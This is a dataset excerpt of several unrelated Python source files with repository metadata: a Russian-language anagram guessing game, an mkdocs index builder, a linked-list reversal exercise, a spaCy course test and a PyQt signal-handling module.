BITs/2014/Kozlov_A_D/task_8_11.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
#Задача 8. Вариант 11.
#1-50. Доработайте игру "Анаграммы" (см. М.Доусон Программируем на Python. Гл.4) так, чтобы к каждому слову полагалась подсказка. Игрок должен получать право на подсказку в том случае, если у него нет никаких предположений. Разработайте систему начисления очков, по которой бы игроки, отгадавшие слово без подсказки, получали больше тех, кто запросил подсказку.
#Козлов А.Д.
#04.04.2016
import random
words = ("питон","анаграмма","простая","сложная","ответ","подстаканник")
word=random.choice(words)
correct=word
score=10;
i=0
jumble=""
while word:
position=random.randrange(len(word))
jumble+=word[position]
word=word[:position]+word[(position+1):]
print("""
Добро пожаловать в игру 'Анаграммы'!
Надо перемтавитьбуквы так, чтобы получилось осмысленное слово.
Для вызова подсказки напишите: подсказка.
(Для выхода нажмите Enter,не вводя своей версии.)
""")
print("Вот анаграмма: ", jumble)
guess=input("Попробуйте отгадать исходное слово: ")
if guess=="подсказка":
score-=1
print(str(i+1),"буква: ",correct[i])
i+=1
while guess !=correct and guess!="":
guess=input("Попробуйте отгадать исходное слово: ")
if guess=="подсказка":
if i==len(correct):
print("Все буквы уже выведены.")
continue
score-=1
print(str(i+1),"буква: ",correct[i])
i+=1
continue
if guess==correct:
print("Да. Именно так! Вы отгадали! Вы зарабботали ",score," очков!")
else:
print("К сожалению, Вы неправы.")
print("Спасибо за игру.")
input("\n\nНажмите Enter, чтобы выйти")
| 37.088889 | 362 | 0.656681 |
cbf60a5f54499551d07c8764354e2a5053355b82
| 899 |
py
|
Python
|
buildencyclopedia.py
|
ZhenyuZ/gdc-docs
|
f024d5d4cd86dfa2c9e7d63850eee94d975b7948
|
[
"Apache-2.0"
] | 67 |
2016-06-09T14:11:51.000Z
|
2022-03-16T07:54:44.000Z
|
buildencyclopedia.py
|
ZhenyuZ/gdc-docs
|
f024d5d4cd86dfa2c9e7d63850eee94d975b7948
|
[
"Apache-2.0"
] | 19 |
2016-06-21T15:51:11.000Z
|
2021-06-07T09:22:20.000Z
|
buildencyclopedia.py
|
ZhenyuZ/gdc-docs
|
f024d5d4cd86dfa2c9e7d63850eee94d975b7948
|
[
"Apache-2.0"
] | 32 |
2016-07-15T01:24:19.000Z
|
2019-03-25T10:42:28.000Z
|
"""updates the encyclopedia section in the mkdocs.yml
should be run whenever a file is removed or added into the directory"""
import os
import yaml
ABSFILEPATH = os.path.dirname(os.path.realpath(__file__))
FILEARRAY = os.listdir(ABSFILEPATH + '/docs/Encyclopedia/pages')
FILEARRAY = sorted(FILEARRAY, key=str.lower)
with open(ABSFILEPATH + '/mkdocs.yml', 'r') as f:
doc = yaml.load(f)
encycdict = next(d for (index, d) in enumerate(doc['pages']) \
if d.get('EncyclopediaEntries', False) != False)
newlist = []
for x in range(len(FILEARRAY)):
if FILEARRAY[x][-3:] == ".md":
tempdict = {FILEARRAY[x][:-3].replace("_"," "):"".join(['Encyclopedia/pages/', FILEARRAY[x][:-3], '.md'])}
newlist.append(tempdict)
encycdict['EncyclopediaEntries'] = newlist
with open(ABSFILEPATH + '/mkdocs.yml', 'w+') as f:
f.write(yaml.dump(doc, default_flow_style=False))
| 32.107143 | 114 | 0.670745 |
ce943e66efc0e44702391aac0684e3625f5526e9
| 718 |
py
|
Python
|
ds/practice/daily_practice/20-07/assets/code/reverse_sll.py
|
tobias-fyi/vela
|
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
|
[
"MIT"
] | null | null | null |
ds/practice/daily_practice/20-07/assets/code/reverse_sll.py
|
tobias-fyi/vela
|
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
|
[
"MIT"
] | 8 |
2020-03-24T17:47:23.000Z
|
2022-03-12T00:33:21.000Z
|
ds/practice/daily_practice/20-07/assets/code/reverse_sll.py
|
tobias-fyi/vela
|
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
|
[
"MIT"
] | null | null | null |
"""
HackerRank :: Reverse a singly-linked list
https://www.hackerrank.com/challenges/reverse-a-linked-list/problem
Complete the reverse function below.
For your reference:
SinglyLinkedListNode:
int data
SinglyLinkedListNode next
"""
def reverse(head):
# head node value can be null
# Keep track of previous node
prev_node = None
cur_node = head
# Loop through - while node.next
while cur_node:
# Save node for overwriting cur_node
next_node = cur_node.next
# Set current node's next to prev_node
cur_node.next = prev_node
# Pass previous node to next iteration
prev_node = cur_node
cur_node = next_node
return prev_node
| 23.16129 | 67 | 0.683844 |
ceadbfc8ec08afd61feb6385ed4d339e585d1115
| 538 |
py
|
Python
|
exercises/de/test_01_07.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/de/test_01_07.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/de/test_01_07.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
def test():
assert "spacy.load" in __solution__, "Rufst du spacy.load auf?"
assert nlp.meta["lang"] == "de", "Lädst du das korrekte Modell?"
assert nlp.meta["name"] == "core_news_sm", "Lädst du das korrekte Modell?"
assert "nlp(text)" in __solution__, "Verarbeitest du den Text korrekt?"
assert "print(doc.text)" in __solution__, "Druckst du den Text des Doc?"
__msg__.good(
"Gut gemacht! Jetzt wo du das Laden von Modellen geübt hast, lass uns "
"mal ein paar ihrer Vorhersagen anschauen."
)
| 44.833333 | 79 | 0.669145 |
f0339846cad63a7692947f289af6990dc4271899
| 3,987 |
py
|
Python
|
easyp2p/p2p_signals.py
|
Ceystyle/easyp2p
|
99c32e3ec0ff5a34733f157dd1b53d1aa9bc9edc
|
[
"MIT"
] | 4 |
2019-07-18T10:58:28.000Z
|
2021-11-18T16:57:45.000Z
|
easyp2p/p2p_signals.py
|
Ceystyle/easyp2p
|
99c32e3ec0ff5a34733f157dd1b53d1aa9bc9edc
|
[
"MIT"
] | 1 |
2019-07-05T09:21:47.000Z
|
2019-07-05T09:21:47.000Z
|
easyp2p/p2p_signals.py
|
Ceystyle/easyp2p
|
99c32e3ec0ff5a34733f157dd1b53d1aa9bc9edc
|
[
"MIT"
] | 2 |
2019-07-05T08:56:34.000Z
|
2020-06-09T10:03:42.000Z
|
# -*- coding: utf-8 -*-
# Copyright (c) 2018-2020 Niko Sandschneider
"""Module implementing Signals for communicating with the GUI."""
from functools import wraps
import logging
from PyQt5.QtCore import QObject, pyqtSignal
class Signals(QObject):
"""Class for signal communication between worker classes and GUI."""
update_progress_bar = pyqtSignal()
add_progress_text = pyqtSignal(str, bool)
abort_signal = pyqtSignal()
get_credentials = pyqtSignal(str)
send_credentials = pyqtSignal(str, str)
def __init__(self):
super().__init__()
self.abort = False
self.abort_signal.connect(self.abort_evaluation)
self.connected = False
self.logger = logging.getLogger('easyp2p.p2p_signals.Signals')
self.logger.debug('Created Signals instance.')
def update_progress(self, func):
"""Decorator for updating progress text and progress bar."""
@wraps(func)
def wrapper(*args, **kwargs):
try:
if self.abort:
raise RuntimeError('Abort by user')
result = func(*args, **kwargs)
except RuntimeError as err:
self.logger.exception('RuntimeError in update_progress')
self.add_progress_text.emit(str(err), True)
raise PlatformFailedError from err
except RuntimeWarning as err:
self.logger.warning(
'RuntimeWarning in update_progress', exc_info=True)
self.add_progress_text.emit(str(err), True)
result = None
finally:
self.update_progress_bar.emit()
return result
return wrapper
def watch_errors(self, func):
"""Decorator for emitting error messages to the progress window."""
@wraps(func)
def wrapper(*args, **kwargs):
try:
result = func(*args, **kwargs)
except RuntimeError as err:
self.logger.exception('RuntimeError in watch_errors.')
self.add_progress_text.emit(str(err), True)
raise PlatformFailedError from err
except RuntimeWarning as err:
self.logger.warning(str(err))
self.add_progress_text.emit(str(err), True)
result = None
return result
return wrapper
def connect_signals(self, other: 'Signals') -> None:
"""
Helper method for connecting signals of different classes.
Args:
other: Signals instance of another class.
"""
self.logger.debug('Connecting signals.')
self.update_progress_bar.connect(other.update_progress_bar)
self.add_progress_text.connect(other.add_progress_text)
self.get_credentials.connect(other.get_credentials)
other.send_credentials.connect(self.send_credentials)
self.connected = True
self.logger.debug('Connecting signals successful.')
def disconnect_signals(self) -> None:
"""
Disconnect signals. Ignore error if they were not connected or if
disconnecting fails.
"""
if not self.connected:
return
self.logger.debug('Disconnecting signals.')
for signal in [
self.add_progress_text, self.get_credentials,
self.update_progress_bar]:
try:
signal.disconnect()
except TypeError:
self.logger.exception(
'Disconnecting signal %s failed.', str(signal))
else:
self.logger.debug('Signal %s disconnected.', str(signal))
self.connected = False
def abort_evaluation(self):
"""Set the abort flag to True."""
self.logger.debug('Aborting evaluation.')
self.abort = True
class PlatformFailedError(Exception):
"""Will be raised if evaluation of a P2P platform fails."""
| 34.37069 | 75 | 0.605719 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.